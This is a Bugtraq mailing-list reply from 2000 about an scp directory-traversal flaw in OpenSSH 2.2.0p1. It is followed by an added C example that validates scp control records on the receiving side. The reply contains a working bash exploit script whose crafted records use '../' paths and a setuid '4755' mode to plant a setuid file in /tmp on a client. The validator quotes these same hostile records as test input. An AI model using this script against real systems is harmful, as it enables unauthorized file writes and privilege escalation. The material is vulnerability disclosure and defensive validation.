[16996] in bugtraq
Re: openssh2.2.p1 - Re: scp file transfer hole
daemon@ATHENA.MIT.EDU (Robert Bihlmeyer)
Mon Oct 2 17:46:48 2000
Message-Id: <87itrbb2bq.fsf@hoss.orcus.priv.at>
Date: Mon, 2 Oct 2000 19:06:01 +0200
Reply-To: Robert Bihlmeyer <robbe@ORCUS.PRIV.AT>
From: Robert Bihlmeyer <robbe@ORCUS.PRIV.AT>
X-To: Martin MaD Douda <martin@DOUDA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Martin MaD Douda's message of "Sun, 1 Oct 2000 12:19:46 +0200"
Martin MaD Douda <martin@DOUDA.NET> writes:
> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".
It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:
--
#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--
> Since openssh 2.2.0p1 is the latest existing version, this vulnerability
> probably exists in every single scp version in the world.
Data Fellows/SSH Communication Security's ssh 2 uses a different file
transfer protocol. So the above exploit won't work. That doesn't mean
that there are more sanity checks, though.
--
Robbe
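
Added example (not part of the message above and not OpenSSH's own code): a receiver-side check for the scp control records the script emits, rejecting any name that is not a single path component and dropping the setuid bit requested by "C4755". The function and type names are hypothetical, and each record is assumed to arrive with its trailing newline already removed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum scp_verdict { SCP_OK = 0, SCP_MALFORMED, SCP_BAD_NAME };
struct scp_record { char type; unsigned mode; unsigned long size; const char *name; };

/*
 * Parse "<C|D><octal mode> <size> <name>" as the receiving side and apply
 * a policy: the name must be one path component (no '/', not "." or ".."),
 * and setuid/setgid/sticky bits asked for by the peer are not honoured.
 */
enum scp_verdict scp_check_record(const char *line, struct scp_record *out)
{
    char *end;

    if (line[0] != 'C' && line[0] != 'D')
        return SCP_MALFORMED;
    if (line[1] < '0' || line[1] > '7')          /* mode must start with an octal digit */
        return SCP_MALFORMED;
    unsigned long mode = strtoul(line + 1, &end, 8);
    if (*end != ' ' || mode > 07777)
        return SCP_MALFORMED;
    const char *p = end + 1;
    if (*p < '0' || *p > '9')                    /* size must start with a digit */
        return SCP_MALFORMED;
    unsigned long size = strtoul(p, &end, 10);
    if (*end != ' ')
        return SCP_MALFORMED;
    const char *name = end + 1;
    if (*name == '\0' || strchr(name, '/') != NULL ||
        strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return SCP_BAD_NAME;                     /* would escape the target directory */
    out->type = line[0];
    out->mode = (unsigned)mode & 0777;           /* strip 04000, 02000, 01000 */
    out->size = size;
    out->name = name;
    return SCP_OK;
}

int main(void)
{
    /* The three control records printed by the script in the message. */
    const char *lines[] = { "D0755 0 ../../../../../../tmp/nope",
                            "D0755 0 ../../../../../../tmp",
                            "C4755 200 ScpIsBuggy" };
    for (size_t i = 0; i < 3; i++) {
        struct scp_record r = {0};
        enum scp_verdict v = scp_check_record(lines[i], &r);
        printf("%-36s verdict=%d mode=%04o\n", lines[i], (int)v, r.mode);
    }
    return 0;
}
```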